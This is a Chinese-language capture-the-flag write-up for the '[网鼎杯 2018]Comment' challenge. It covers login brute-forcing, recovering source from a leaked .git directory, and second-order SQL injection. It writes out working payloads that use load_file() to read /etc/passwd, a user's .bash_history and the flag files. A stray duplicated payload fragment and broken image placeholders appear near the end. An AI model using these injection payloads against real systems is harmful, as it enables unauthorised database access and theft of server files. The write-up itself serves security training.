使用环境为https://adworld.xctf.org.cn/challenges,搜索题目\[网鼎杯 2018]Comment。
进入环境,发现为一个留言板,点击发帖试试。
尝试发帖
跳转到登录页面,根据提示使用burp进行暴力破解。
发现payload为666时状态码不同。
尝试密码为zhangwei666发现登录成功。
使用awvs进行扫描。发现存在.git目录,并且存在git泄露漏洞。尝试使用githacker恢复源码。
刚恢复完是一段残缺的代码,需要进行恢复到完整代码
git log --reflog
git reset --hard 版本
完整源码
php
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>分析代码可知,当do=write时,传入的参数中的单引号均被过滤掉,而当do=comment时,category被直接拿来用,没有被过滤单引号,那么二次注入点就在此。
构建payload:
在do=write时,title和content随便写,将category写成下面payload
',content=database(),/*
然后在do=comment时,将content写成
*/#
也就合成了一个查询函数
$sql = "insert into comment
set category = '',content=database(),/*',
content = '*/#',
bo_id = '$bo_id'";
查询flag是根据网上的资料查找的。
查看当前登录的用户
',content=user(),/*
得知使用者是root权限
sql注入读取本地文件,使用load_file()
/etc/passwd这里存储用户信息
',content=(select load_file('/etc/passwd')),/*
有一个www用户,查看bash_history
',content=(select load_file('/home/www/.bash_history')),/*
发现有一操作rm -f .DS_Store删除了.DS_Store这个文件。而 .DS_Store 文件中,经常会有一些不可见的字符,可以使用hex函数对其进行16进制转换。
',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
全部复制并且进行ascii 十六进制解码。
发现有一段flag_8946e1ff1ee3e40f.php,尝试查看这个文件
',content=(select load_file('/tmp/html/flag_8946e1ff1ee3e40f.php')),/*
发现为空,那就加上hex尝试
',content=(select hex(load_file('/tmp/html/flag_8946e1ff1ee3e40f.php'))),/*
解码
得到结果
<?php
$flag = 'flag{f9ca1a6b-9d78-11e8-90a3-c4b301b7b99b}';
?>
但是提交答案发现是假的,尝试其他目录
',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
解码
<?php
$flag="flag{0dd14aae81d94904b3492117e2a3d4df}";
?>
ee3e40f.php'))),/*
[外链图片转存中...(img-EZ2sqSXR-1722830529065)]
解码
[外链图片转存中...(img-OSTJQXO8-1722830529065)]
<?php $flag="flag{0dd14aae81d94904b3492117e2a3d4df}"; ?>
得到正确的flag